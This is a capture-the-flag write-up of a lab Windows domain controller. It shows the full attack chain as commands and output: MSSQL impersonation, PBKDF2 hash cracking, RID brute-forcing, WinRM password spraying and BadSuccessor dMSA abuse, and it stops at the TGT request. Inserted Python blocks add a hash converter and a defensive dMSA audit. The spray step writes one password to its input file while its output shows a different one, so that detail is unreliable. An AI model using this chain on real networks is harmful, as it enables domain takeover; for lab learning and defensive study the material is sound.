This was a really tough one, and I eventually got the System Flag in a very roundabout way. I strongly suspect there were easier ways to get that flag, but I could not figure out how to get around the walls I ran into left and right.

Anyway, let’s get to it.

Starting this machine, we already have basic credentials:

As is common in real life Windows penetration tests, you will start the Eighteen box with credentials for the following account: kevin / iNa2we6haRj2gaw!
— Machine Information


Let’s first enum:

mairon s $ nmap -Pn -n -v -sCV eighteen.htb --top-port 10000 -oN eighteen.txt
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-27 11:22 +0100
NSE: Loaded 158 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 11:22
Completed NSE at 11:22, 0.00s elapsed
Initiating NSE at 11:22
Completed NSE at 11:22, 0.00s elapsed
Initiating NSE at 11:22
Completed NSE at 11:22, 0.00s elapsed
Initiating Connect Scan at 11:22
Scanning eighteen.htb (10.129.7.133) [8380 ports]
Discovered open port 80/tcp on 10.129.7.133
Discovered open port 1433/tcp on 10.129.7.133
Discovered open port 5985/tcp on 10.129.7.133
Completed Connect Scan at 11:22, 23.52s elapsed (8380 total ports)
Initiating Service scan at 11:22
Scanning 3 services on eighteen.htb (10.129.7.133)
Completed Service scan at 11:22, 6.09s elapsed (3 services on 1 host)
NSE: Script scanning 10.129.7.133.
Initiating NSE at 11:22
Completed NSE at 11:22, 5.10s elapsed
Initiating NSE at 11:22
Completed NSE at 11:22, 1.26s elapsed
Initiating NSE at 11:22
Completed NSE at 11:22, 0.00s elapsed
Nmap scan report for eighteen.htb (10.129.7.133)
Host is up (0.017s latency).
Not shown: 8377 filtered tcp ports (no-response)
PORT     STATE SERVICE  VERSION
80/tcp   open  http     Microsoft IIS httpd 10.0
| http-methods:
|_  Supported Methods: GET HEAD OPTIONS
|_http-title: Welcome - eighteen.htb
|_http-server-header: Microsoft-IIS/10.0
1433/tcp open  ms-sql-s Microsoft SQL Server 2022 16.00.1000.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 3072
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2026-01-27T16:59:31
| Not valid after:  2056-01-27T16:59:31
| MD5:     976b 4bf7 3d8a 54e3 58ff 2e56 91cb db98
| SHA-1:   b4b0 a023 cfb7 4898 fac7 44f4 364e bfe7 526e cb24
|_SHA-256: 542a ab7f 8e24 63cb 259c 3395 738e 3d19 4425 ea0f 4e63 b263 3651 9fd5 f51c 099e
| ms-sql-info:
|   10.129.7.133:1433:
|     Version:
|       name: Microsoft SQL Server 2022 RTM
|       number: 16.00.1000.00
|       Product: Microsoft SQL Server 2022
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
|_ssl-date: 2026-01-27T17:22:36+00:00; +7h00m00s from scanner time.
| ms-sql-ntlm-info:
|   10.129.7.133:1433:
|     Target_Name: EIGHTEEN
|     NetBIOS_Domain_Name: EIGHTEEN
|     NetBIOS_Computer_Name: DC01
|     DNS_Domain_Name: eighteen.htb
|     DNS_Computer_Name: DC01.eighteen.htb
|     DNS_Tree_Name: eighteen.htb
|_    Product_Version: 10.0.26100
5985/tcp open  http     Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m59s

NSE: Script Post-scanning.
Initiating NSE at 11:22
Completed NSE at 11:22, 0.00s elapsed
Initiating NSE at 11:22
Completed NSE at 11:22, 0.00s elapsed
Initiating NSE at 11:22
Completed NSE at 11:22, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36.13 seconds

Let’s check that web page for a redirect:

mairon 17s $ curl -i 10.129.7.133
HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=UTF-8
Location: http://eighteen.htb/
Server: Microsoft-IIS/10.0
Date: Tue, 27 Jan 2026 16:58:54 GMT
Content-Length: 143

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="http://eighteen.htb/">here</a></body>

Thought as much. Let’s add it to our /etc/hosts:

mairon $ echo 10.129.7.133 eighteen.htb | sudo tee -a /etc/hosts
10.129.7.133 eighteen.htb

Logging in to the web page did not work with the supplied credentials. Logging in via WinRM also didn’t, sadly. MSSQL worked:

mairon $ mssqlclient.py kevin:'iNa2we6haRj2gaw!'@eighteen.htb
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server 2022 RTM (16.0.1000)
[!] Press help for extra shell commands
SQL (kevin  guest@master)>

I could not enable xp_cmdshell, but I could enum the following:

SQL (kevin  guest@master)> enum_users
UserName             RoleName   LoginName   DefDBName   DefSchemaName       UserID     SID
------------------   --------   ---------   ---------   -------------   ----------   -----
dbo                  db_owner   sa          master      dbo             b'1         '   b'01'
guest                public     NULL        NULL        guest           b'2         '   b'00'
INFORMATION_SCHEMA   public     NULL        NULL        NULL            b'3         '    NULL
sys                  public     NULL        NULL        NULL            b'4         '    NULL
SQL (kevin  guest@master)> enum_db
name                is_trustworthy_on
-----------------   -----------------
master                              0
tempdb                              0
model                               0
msdb                                1
financial_planner                   0

I could not use the financial_planner db as kevin, but I did find that kevin has impersonate rights on appdev:

SQL (kevin  guest@master)> enum_impersonate
execute as   database   permission_name   state_desc   grantee   grantor
----------   --------   ---------------   ----------   -------   -------
b'LOGIN'     b''        IMPERSONATE       GRANT        kevin     appdev
SQL (kevin  guest@master)> EXECUTE AS LOGIN = 'appdev';
SQL (appdev  appdev@master)>
SQL (appdev  appdev@master)> USE financial_planner;
ENVCHANGE(DATABASE): Old Value: master, New Value: financial_planner
INFO(DC01): Line 1: Changed database context to 'financial_planner'.
SQL (appdev  appdev@financial_planner)>

Further enum:

SQL (appdev  appdev@financial_planner)> select name from financial_planner.sys.tables;
name
-----------
users
incomes
expenses
allocations
analytics
visits
SQL (appdev  appdev@financial_planner)> select * from financial_planner.dbo.users;
  id   full_name   username   email                password_hash                                                                                            is_admin   created_at
----   ---------   --------   ------------------   ------------------------------------------------------------------------------------------------------   --------   ----------
1002   admin       admin      admin@eighteen.htb   pbkdf2:sha256:600000$AMtzteQIG7yAbZIa$0673ad90a0b4afb19d662336f0fce3a9edd0b7b19193717be28ce4d66c887133          1   2025-10-29 05:39:03

Cracking this hash took a long time, mainly because it is apparently stored in a different format than the one Hashcat expects. I found type 10900 to be the closest match:

mairon $ hashcat --hash-info -m 10900
hashcat (v7.1.2) starting in hash-info mode

Hash Info:
==========

Hash mode #10900
  Name................: PBKDF2-HMAC-SHA256
  Category............: Generic KDF
  Slow.Hash...........: Yes
  Deprecated..........: No
  Deprecated.Notice...: N/A
  Password.Type.......: plain
  Password.Len.Min....: 0
  Password.Len.Max....: 256
  Salt.Type...........: Embedded
  Salt.Len.Min........: 0
  Salt.Len.Max........: 256
  Kernel.Type(s)......: pure
  Example.Hash.Format.: plain
  Example.Hash........: sha256:1000:NjI3MDM3:vVfavLQL9ZWjg8BUMq6/FB8FtpkIGWYk
  Example.Pass........: hashcat
  Benchmark.Mask......: ?a?a?a?a?a?a?a
  Autodetect.Enabled..: Yes
  Self.Test.Enabled...: Yes
  Potfile.Enabled.....: Yes
  Keep.Guessing.......: No
  Custom.Plugin.......: No
  Plaintext.Encoding..: ASCII, HEX

Not only do we need to omit the pbkdf2: part of our hash, but we also need to replace the $ separator between the salt and the hash with a :. So, I tried cracking like so:

mairon $ hashcat -m 10900 'sha256:600000:AMtzteQIG7yAbZIa:0673ad90a0b4afb19d662336f0fce3a9edd0b7b19193717be28ce4d66c887133' /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt.tar.gz --potfile-disable

Not only is this an expensive hash to compute (600000 PBKDF2 iterations, so I needed my GPU rather than just my CPU), it turns out the hash was still not in the right format.

Upon closer inspection, the digest part of Hashcat’s example hash (vVfavLQL9ZWjg8BUMq6/FB8FtpkIGWYk) is base64, not hex like the one we obtained. The salt part already looks like base64 (or at least not hex), so I tried converting the digest and cracking it like so:

mairon $ printf '0673ad90a0b4afb19d662336f0fce3a9edd0b7b19193717be28ce4d66c887133' | base64 -w 99
MDY3M2FkOTBhMGI0YWZiMTlkNjYyMzM2ZjBmY2UzYTllZGQwYjdiMTkxOTM3MTdiZTI4Y2U0ZDY2Yzg4NzEzMw==
mairon $ hashcat -m 10900 'sha256:600000:AMtzteQIG7yAbZIa:MDY3M2FkOTBhMGI0YWZiMTlkNjYyMzM2ZjBmY2UzYTllZGQwYjdiMTkxOTM3MTdiZTI4Y2U0ZDY2Yzg4NzEzMw==' /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt.tar.gz --potfile-disable

Hashcat no longer complained about the format, but I still could not crack it. Again, it turned out the hash was not yet in the right format: the salt needs to be base64-encoded as well, since Werkzeug used the literal string AMtzteQIG7yAbZIa as the salt bytes, and Hashcat wants the base64 encoding of those bytes rather than the string itself. I eventually found an open Hashcat issue on GitHub which mentioned a script to convert a hash very similar to ours to the correct Hashcat format. I copied it and replaced my hash inside, like so:

#!/usr/bin/env python3
import base64, codecs, re

# Werkzeug-style hash as stored in the users table: pbkdf2:sha256:<iterations>$<salt>$<hex digest>
example = b'pbkdf2:sha256:600000$AMtzteQIG7yAbZIa$0673ad90a0b4afb19d662336f0fce3a9edd0b7b19193717be28ce4d66c887133'

m = re.match(br'pbkdf2:sha256:(\d*)\$([^\$]*)\$(.*)', example)
iterations = m.group(1)
salt = m.group(2)       # the literal salt string; Hashcat wants it base64-encoded
hashe = m.group(3)      # hex digest; Hashcat wants base64 of the raw digest bytes
# hashcat -m 10900 format: sha256:<iterations>:base64(salt):base64(raw digest)
print(f"sha256:{iterations.decode()}:{base64.b64encode(salt).decode()}:{base64.b64encode(codecs.decode(hashe,'hex')).decode()}")

The script converted the hash like so:

mairon $ python convert.py
sha256:600000:QU10enRlUUlHN3lBYlpJYQ==:BnOtkKC0r7GdZiM28Pzjqe3Qt7GRk3F74ozk1myIcTM=

This converted hash actually cracked 🎉:

mairon $ hashcat -O -m 10900 'sha256:600000:QU10enRlUUlHN3lBYlpJYQ==:BnOtkKC0r7GdZiM28Pzjqe3Qt7GRk3F74ozk1myIcTM=' /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt.tar.gz --potfile-disable
hashcat (v7.1.2) starting

Kernel /usr/share/hashcat/OpenCL/m10900-optimized.cl:
Optimized kernel requested, but not available or not required
Falling back to pure kernel

CUDA API (CUDA 13.1)
====================
* Device #01: NVIDIA GeForce RTX 4070 SUPER, 11172/11874 MB, 56MCU

OpenCL API (OpenCL 3.0 CUDA 13.1.112) - Platform #1 [NVIDIA Corporation]
========================================================================
* Device #02: NVIDIA GeForce RTX 4070 SUPER, skipped

Kernel /usr/share/hashcat/OpenCL/m10900-optimized.cl:
Optimized kernel requested, but not available or not required
Falling back to pure kernel

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Minimum salt length supported by kernel: 0
Maximum salt length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt
* Slow-Hash-SIMD-LOOP

Watchdog: Temperature abort trigger set to 90c

Host memory allocated for this attack: 2394 MB (28920 MB free)

Dictionary cache hit:
* Filename..: /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt.tar.gz
* Passwords.: 14344383
* Bytes.....: 53291283
* Keyspace..: 14344383

Cracking performance lower than expected?

* Append -w 3 to the commandline.
  This can cause your screen to lag.

* Append -S to the commandline.
  This has a drastic speed impact but can be better for specific attacks.
  Typical scenarios are a small wordlist but a large ruleset.

* Update your backend API runtime / driver the right way:
  https://hashcat.net/faq/wrongdriver

* Create more work items to make use of your parallelization power:
  https://hashcat.net/faq/morework

sha256:600000:QU10enRlUUlHN3lBYlpJYQ==:BnOtkKC0r7GdZiM28Pzjqe3Qt7GRk3F74ozk1myIcTM=:iloveyou1

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 10900 (PBKDF2-HMAC-SHA256)
Hash.Target......: sha256:600000:QU10enRlUUlHN3lBYlpJYQ==:BnOtkKC0r7Gd...yIcTM=
Time.Started.....: Tue Jan 27 14:48:09 2026 (14 secs)
Time.Estimated...: Tue Jan 27 14:48:23 2026 (0 secs)
Kernel.Feature...: Pure Kernel (password length 0-256 bytes)
Guess.Base.......: File (/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt.tar.gz)
Guess.Queue......: 1/1 (100.00%)
Speed.#01........:     6033 H/s (11.72ms) @ Accel:6 Loops:500 Thr:256 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 86016/14344383 (0.60%)
Rejected.........: 0/86016 (0.00%)
Restore.Point....: 0/14344383 (0.00%)
Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:599500-599999
Candidate.Engine.: Device Generator
Candidates.#01...: 12345 -> bunny10
Hardware.Mon.#01.: Temp: 67c Fan: 51% Util: 99% Core:2775MHz Mem:10251MHz Bus:16

Started: Tue Jan 27 14:48:08 2026
Stopped: Tue Jan 27 14:48:24 2026
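
The conversion above and the cracked result can both be checked without Hashcat. The following Python is an added example, not the script from the Hashcat issue nor anything from the box: it parses a Werkzeug-style pbkdf2 hash, emits the Hashcat line together with the matching mode (it goes beyond the page’s sha256 case by also covering the sha1 and sha512 variants, modes 12000 and 12100), and recomputes PBKDF2 with hashlib to confirm that a candidate password really does produce the stored digest. The only input is the admin hash from the users table; everything else is standard library.

```python
#!/usr/bin/env python3
"""Convert Werkzeug pbkdf2 hashes to hashcat format and verify candidates locally."""
import base64
import hashlib
import hmac
import re

# Werkzeug / Flask format: pbkdf2:<method>:<iterations>$<salt>$<hex digest>
WERKZEUG_RE = re.compile(r"^pbkdf2:(sha\d+):(\d+)\$([^$]+)\$([0-9a-fA-F]+)$")

# hashcat mode per digest: PBKDF2-HMAC-SHA1 / -SHA256 / -SHA512
HASHCAT_MODES = {"sha1": 12000, "sha256": 10900, "sha512": 12100}


def parse_werkzeug_hash(h):
    """Split a Werkzeug hash into (method, iterations, salt bytes, digest bytes)."""
    m = WERKZEUG_RE.match(h)
    if not m:
        raise ValueError("not a Werkzeug pbkdf2 hash")
    method, iterations, salt, digest_hex = m.groups()
    if method not in HASHCAT_MODES:
        raise ValueError(f"unsupported digest {method}")
    # Werkzeug feeds the salt string's ASCII bytes straight into PBKDF2,
    # so the salt must be kept as-is (not hex-decoded) and later base64'd.
    return method, int(iterations), salt.encode(), bytes.fromhex(digest_hex)


def to_hashcat(h):
    """Return (mode, line); line is <method>:<iterations>:b64(salt):b64(raw digest)."""
    method, iterations, salt, digest = parse_werkzeug_hash(h)
    line = ":".join([
        method,
        str(iterations),
        base64.b64encode(salt).decode(),
        base64.b64encode(digest).decode(),
    ])
    return HASHCAT_MODES[method], line


def verify_password(h, candidate):
    """Recompute PBKDF2 over the candidate and compare in constant time."""
    method, iterations, salt, digest = parse_werkzeug_hash(h)
    computed = hashlib.pbkdf2_hmac(method, candidate.encode(), salt,
                                   iterations, dklen=len(digest))
    return hmac.compare_digest(computed, digest)


# The admin hash read from financial_planner.dbo.users.
ADMIN_HASH = ("pbkdf2:sha256:600000$AMtzteQIG7yAbZIa$"
              "0673ad90a0b4afb19d662336f0fce3a9edd0b7b19193717be28ce4d66c887133")

if __name__ == "__main__":
    mode, line = to_hashcat(ADMIN_HASH)
    print(f"hashcat -m {mode} '{line}' wordlist.txt")
    print("iloveyou1 matches:", verify_password(ADMIN_HASH, "iloveyou1"))
```

Running it prints the exact Hashcat line the convert.py script produced, and the verification step is the quickest way to tell a format mistake from a password that simply is not in the wordlist: if the candidate Hashcat reports does not verify here, the conversion was wrong.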

We now have a credential: admin:iloveyou1.

This works on the web page, but I sadly did not find a way in from there. I still suspect there must’ve been a way to upload a webshell there somewhere, but I eventually gave up, and went back to MSSQL.

NetExec has a new way to bruteforce RIDs with valid credentials for MSSQL:

mairon $ nxc mssql eighteen.htb -u kevin -p 'iNa2we6haRj2gaw!' --rid-brute --local-auth
MSSQL       10.129.7.133    1433   DC01             [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:eighteen.htb) (EncryptionReq:False)
MSSQL       10.129.7.133    1433   DC01             [+] DC01\kevin:iNa2we6haRj2gaw!
MSSQL       10.129.7.133    1433   DC01             498: EIGHTEEN\Enterprise Read-only Domain Controllers
MSSQL       10.129.7.133    1433   DC01             500: EIGHTEEN\Administrator
MSSQL       10.129.7.133    1433   DC01             501: EIGHTEEN\Guest
MSSQL       10.129.7.133    1433   DC01             502: EIGHTEEN\krbtgt
MSSQL       10.129.7.133    1433   DC01             512: EIGHTEEN\Domain Admins
MSSQL       10.129.7.133    1433   DC01             513: EIGHTEEN\Domain Users
MSSQL       10.129.7.133    1433   DC01             514: EIGHTEEN\Domain Guests
MSSQL       10.129.7.133    1433   DC01             515: EIGHTEEN\Domain Computers
MSSQL       10.129.7.133    1433   DC01             516: EIGHTEEN\Domain Controllers
MSSQL       10.129.7.133    1433   DC01             517: EIGHTEEN\Cert Publishers
MSSQL       10.129.7.133    1433   DC01             518: EIGHTEEN\Schema Admins
MSSQL       10.129.7.133    1433   DC01             519: EIGHTEEN\Enterprise Admins
MSSQL       10.129.7.133    1433   DC01             520: EIGHTEEN\Group Policy Creator Owners
MSSQL       10.129.7.133    1433   DC01             521: EIGHTEEN\Read-only Domain Controllers
MSSQL       10.129.7.133    1433   DC01             522: EIGHTEEN\Cloneable Domain Controllers
MSSQL       10.129.7.133    1433   DC01             525: EIGHTEEN\Protected Users
MSSQL       10.129.7.133    1433   DC01             526: EIGHTEEN\Key Admins
MSSQL       10.129.7.133    1433   DC01             527: EIGHTEEN\Enterprise Key Admins
MSSQL       10.129.7.133    1433   DC01             528: EIGHTEEN\Forest Trust Accounts
MSSQL       10.129.7.133    1433   DC01             529: EIGHTEEN\External Trust Accounts
MSSQL       10.129.7.133    1433   DC01             553: EIGHTEEN\RAS and IAS Servers
MSSQL       10.129.7.133    1433   DC01             571: EIGHTEEN\Allowed RODC Password Replication Group
MSSQL       10.129.7.133    1433   DC01             572: EIGHTEEN\Denied RODC Password Replication Group
MSSQL       10.129.7.133    1433   DC01             1000: EIGHTEEN\DC01$
MSSQL       10.129.7.133    1433   DC01             1101: EIGHTEEN\DnsAdmins
MSSQL       10.129.7.133    1433   DC01             1102: EIGHTEEN\DnsUpdateProxy
MSSQL       10.129.7.133    1433   DC01             1601: EIGHTEEN\mssqlsvc
MSSQL       10.129.7.133    1433   DC01             1602: EIGHTEEN\SQLServer2005SQLBrowserUser$DC01
MSSQL       10.129.7.133    1433   DC01             1603: EIGHTEEN\HR
MSSQL       10.129.7.133    1433   DC01             1604: EIGHTEEN\IT
MSSQL       10.129.7.133    1433   DC01             1605: EIGHTEEN\Finance
MSSQL       10.129.7.133    1433   DC01             1606: EIGHTEEN\jamie.dunn
MSSQL       10.129.7.133    1433   DC01             1607: EIGHTEEN\jane.smith
MSSQL       10.129.7.133    1433   DC01             1608: EIGHTEEN\alice.jones
MSSQL       10.129.7.133    1433   DC01             1609: EIGHTEEN\adam.scott
MSSQL       10.129.7.133    1433   DC01             1610: EIGHTEEN\bob.brown
MSSQL       10.129.7.133    1433   DC01             1611: EIGHTEEN\carol.white
MSSQL       10.129.7.133    1433   DC01             1612: EIGHTEEN\dave.green

Now we have a user list which we can password spray:

mairon $ echo -e "jamie.dunn\njane.smith\nalice.jones\nadam.scott\nbob.brown\ncarol.white\ndave.green" > users.txt
mairon $ echo "iNa2we6haRj2gaw!" > password.txt
mairon $ nxc winrm eighteen.htb -u users.txt -p password.txt --no-bruteforce
WINRM       10.129.7.133    5985   DC01             [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:eighteen.htb)
WINRM       10.129.7.133    5985   DC01             [-] eighteen.htb\jamie.dunn:iloveyou1
WINRM       10.129.7.133    5985   DC01             [-] eighteen.htb\jane.smith:iloveyou1
WINRM       10.129.7.133    5985   DC01             [-] eighteen.htb\alice.jones:iloveyou1
WINRM       10.129.7.133    5985   DC01             [+] eighteen.htb\adam.scott:iloveyou1 (Pwn3d!)

Sweet, now let’s login as adam.scott:iloveyou1, and get our User Flag 🎉:

mairon $ ewp -i eighteen.htb -u adam.scott@eighteen.htb -p 'iloveyou1'
          _ _            _
  _____ _(_| |_____ __ _(_)_ _  _ _ _ __ ___ _ __ _  _
 / -_\ V | | |___\ V  V | | ' \| '_| '  |___| '_ | || |
 \___|\_/|_|_|    \_/\_/|_|_||_|_| |_|_|_|  | .__/\_, |
                                            |_|   |__/  v1.5.0

[*] Connecting to 'eighteen.htb:5985' as 'adam.scott@eighteen.htb'
evil-winrm-py PS C:\Users\adam.scott\Documents> type ..\Desktop\user.txt
94591b0e72b8c1eb22d228fa54541422

We could run tools like WinPEAS from here, but since this is a domain, let’s try bloodyAD:

evil-winrm-py PS C:\Users\adam.scott\Documents> upload ../bloodyAD.exe .
Uploading /home/mairon/htb/bloodyAD.exe: 12.8MB [00:14, 943kB/s]
[+] File uploaded successfully as: C:\Users\adam.scott\Documents\bloodyAD.exe
evil-winrm-py PS C:\Users\adam.scott\Documents> .\bloodyAD.exe --host localhost -u adam.scott -p iloveyou1 get writable

distinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=eighteen,DC=htb
permission: WRITE

distinguishedName: OU=Staff,DC=eighteen,DC=htb
permission: CREATE_CHILD

distinguishedName: CN=adam.scott,OU=Staff,DC=eighteen,DC=htb
permission: WRITE

distinguishedName: DC=_msdcs.eighteen.htb,CN=MicrosoftDNS,DC=ForestDnsZones,DC=eighteen,DC=htb
permission: CREATE_CHILD
unicrypto\backends\cryptography\RC4.py:13: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0.

We got CREATE_CHILD on the Staff OU. Recall NetExec reported this is a Windows Server 2025 Build 26100 x64 machine. We might just be able to exploit BadSuccessor, the dMSA abuse that only needs CREATE_CHILD on an OU in a domain with a Server 2025 domain controller.

From here I followed BriPwn’s video on BadSuccessor to exploit this. I did not manage to get this to work via SharpSuccessor (as also covered in the video) and so I did it the manual way.

First, create a new computer account (ms-DS-MachineAccountQuota allows regular users to do this by default, and that is also the case in this domain):

evil-winrm-py PS C:\Users\adam.scott\Documents> New-ADComputer -name PwnedMachine -SamAccountName 'PwnedMachine$' -AccountPassword (ConvertTo-SecureString -String "Duif123!" -AsPlainText -Force) -Enabled $true -Path "OU=Staff,DC=eighteen,DC=htb" -PassThru -Server "DC01"


DistinguishedName : CN=PwnedMachine,OU=Staff,DC=eighteen,DC=htb
DNSHostName       :
Enabled           : True
Name              : PwnedMachine
ObjectClass       : computer
ObjectGUID        : 40905233-f614-4203-ab1e-885bc6cd83f2
SamAccountName    : PwnedMachine$
SID               : S-1-5-21-1152179935-589108180-1989892463-12601
UserPrincipalName :

Use Rubeus to get the AES256 key of the computer account, and write it down:

evil-winrm-py PS C:\Users\adam.scott\Documents> .\Rubeus.exe hash /password:Duif123! /user:PwnedMachine$ /domain:eighteen.htb

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.3.3


[*] Action: Calculate Password Hash(es)

[*] Input password             : Duif123!
[*] Input username             : PwnedMachine$
[*] Input domain               : eighteen.htb
[*] Salt                       : EIGHTEEN.HTBhostpwnedmachine.eighteen.htb
[*]       rc4_hmac             : 6753C6DEE157E956BDD4513C84B02196
[*]       aes128_cts_hmac_sha1 : 5CE4791856782878D1523ACE15C44F3B
[*]       aes256_cts_hmac_sha1 : BD583C1DCEA9967744A784C829B5825E961F4AD60F4A3AB8FB488727A0752CF1
[*]       des_cbc_md5          : 4ABC43B9700E9E31

Now we will add our dMSA and configure it so that its password can be read via the computer account we added. We will also link the dMSA to the DC’s Administrator account as its predecessor (crazy that regular users can do this):

evil-winrm-py PS C:\Users\adam.scott\Documents> New-ADServiceAccount -Name "Pwned_DMSA" -DNSHostname "eighteen.htb" -CreateDelegatedServiceAccount -PrincipalsAllowedToRetrieveManagedPassword "PwnedMachine$" -Path "OU=Staff,DC=eighteen,DC=htb"
evil-winrm-py PS C:\Users\adam.scott\Documents> $sid = (Get-ADUser -Identity "adam.scott").SID
evil-winrm-py PS C:\Users\adam.scott\Documents> $acl = Get-Acl "AD:\CN=Pwned_DMSA,OU=Staff,DC=eighteen,DC=htb"
evil-winrm-py PS C:\Users\adam.scott\Documents> $rule = New-Object System.DirectoryServices.ActiveDirectoryAccessRule $sid, "GenericAll", "Allow"
evil-winrm-py PS C:\Users\adam.scott\Documents> $acl.AddAccessRule($rule)
evil-winrm-py PS C:\Users\adam.scott\Documents> Set-Acl -Path "AD:\CN=Pwned_DMSA,OU=Staff,DC=eighteen,DC=htb" -AclObject $acl
evil-winrm-py PS C:\Users\adam.scott\Documents> Set-ADServiceAccount -Identity Pwned_DMSA -Replace @{ 'msDS-ManagedAccountPrecededByLink' = 'CN=Administrator,CN=Users,DC=eighteen,DC=htb' }
evil-winrm-py PS C:\Users\adam.scott\Documents> Set-ADServiceAccount -Identity Pwned_DMSA -Replace @{ 'msDS-DelegatedMSAState' = 2 }
evil-winrm-py PS C:\Users\adam.scott\Documents> Get-ADServiceAccount -Identity Pwned_DMSA -Properties msDS-ManagedAccountPrecededByLink, msDS-DelegatedMSAState | Select-Object Name, msDS-ManagedAccountPrecededByLink, msDS-DelegatedMSAState

Name       msDS-ManagedAccountPrecededByLink            msDS-DelegatedMSAState
----       ---------------------------------            ----------------------
Pwned_DMSA CN=Administrator,CN=Users,DC=eighteen,DC=htb                      2
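
Seen from the defending side, the two attributes set above are exactly what an audit should look for. The following Python is added here as an example and is not part of the original writeup or of any tool it mentions: it runs a simple check over dMSA records as they might come out of an LDAP export. The records, the privileged-account list and the expected container are constructed assumptions; only the attribute names and the state value 2 come from the page. It flags any dMSA whose migration is marked complete (msDS-DelegatedMSAState = 2) with msDS-ManagedAccountPrecededByLink pointing at a privileged account, and any dMSA created outside the container where they are normally provisioned.

```python
#!/usr/bin/env python3
"""Audit delegated MSA objects for the BadSuccessor pattern."""

# Constructed sample export: attribute names as on the page, values made up.
DMSA_ENTRIES = [
    {
        "distinguishedName": "CN=Pwned_DMSA,OU=Staff,DC=eighteen,DC=htb",
        "msDS-DelegatedMSAState": 2,
        "msDS-ManagedAccountPrecededByLink": "CN=Administrator,CN=Users,DC=eighteen,DC=htb",
    },
    {
        # constructed: a legitimate migration of an ordinary service account
        "distinguishedName": "CN=svc_backup_dmsa,CN=Managed Service Accounts,DC=eighteen,DC=htb",
        "msDS-DelegatedMSAState": 2,
        "msDS-ManagedAccountPrecededByLink": "CN=svc_backup,OU=Service Accounts,DC=eighteen,DC=htb",
    },
    {
        # constructed: dMSA with no migration link set at all
        "distinguishedName": "CN=svc_web_dmsa,CN=Managed Service Accounts,DC=eighteen,DC=htb",
        "msDS-DelegatedMSAState": 0,
        "msDS-ManagedAccountPrecededByLink": None,
    },
]

# Assumed for the example: accounts that should never be superseded by a dMSA.
PRIVILEGED_DNS = {
    "cn=administrator,cn=users,dc=eighteen,dc=htb",
    "cn=krbtgt,cn=users,dc=eighteen,dc=htb",
}

# Assumed for the example: the only container where dMSAs are provisioned.
EXPECTED_PARENTS = {"cn=managed service accounts,dc=eighteen,dc=htb"}

MIGRATION_COMPLETED = 2  # msDS-DelegatedMSAState value the page sets


def parent_dn(dn):
    """Container part of a DN (everything after the first RDN).

    Simple split; RDN values containing an escaped comma are not handled."""
    return dn.split(",", 1)[1].strip().lower()


def audit_dmsa(entries, privileged_dns=PRIVILEGED_DNS, expected_parents=EXPECTED_PARENTS):
    """Return [(dn, [reasons])] for every dMSA that looks suspicious."""
    findings = []
    for entry in entries:
        dn = entry["distinguishedName"]
        link = entry.get("msDS-ManagedAccountPrecededByLink")
        state = entry.get("msDS-DelegatedMSAState", 0)
        reasons = []
        # A completed migration that supersedes a privileged account lets the
        # dMSA inherit that account's rights, which is the BadSuccessor outcome.
        if state == MIGRATION_COMPLETED and link and link.lower() in privileged_dns:
            reasons.append(f"completed migration from privileged account {link}")
        # dMSAs turning up in an OU where regular users hold CREATE_CHILD are
        # the other half of the pattern.
        if parent_dn(dn) not in expected_parents:
            reasons.append("dMSA created outside the expected container")
        if reasons:
            findings.append((dn, reasons))
    return findings


if __name__ == "__main__":
    for dn, reasons in audit_dmsa(DMSA_ENTRIES):
        print(dn)
        for reason in reasons:
            print("  -", reason)
```

Run against the sample data, only the Pwned_DMSA record is reported, for both reasons. In a real environment the entries would come from an LDAP query for objectClass msDS-DelegatedManagedServiceAccount, and the privileged list would be derived from group membership rather than typed in.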

Using the previously retrieved computer account’s AES256 key, we can ask for a TGT:

